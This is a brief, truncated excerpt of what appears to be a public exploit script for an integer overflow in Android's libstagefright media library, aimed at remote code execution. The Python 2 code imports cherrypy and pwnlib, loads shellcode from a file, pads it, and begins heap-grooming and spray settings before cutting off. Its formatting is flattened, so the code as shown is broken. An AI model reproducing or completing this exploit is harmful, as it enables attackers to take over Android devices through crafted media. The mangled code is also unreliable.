Google Android - libstagefright Integer Overflow Remote Code Execution
!/usr/bin/python2 import cherrypy import os import pwnlib.asm as asm import pwnlib.elf as elf import sys import struct with open'shellcode.bin', 'rb' as tmp: shellcode = tmp.read while lenshellcode % 4 != 0: shellcode += '\x00' heap grooming configuration allocsize = 0x20 groomcount = 0x4 spraysi...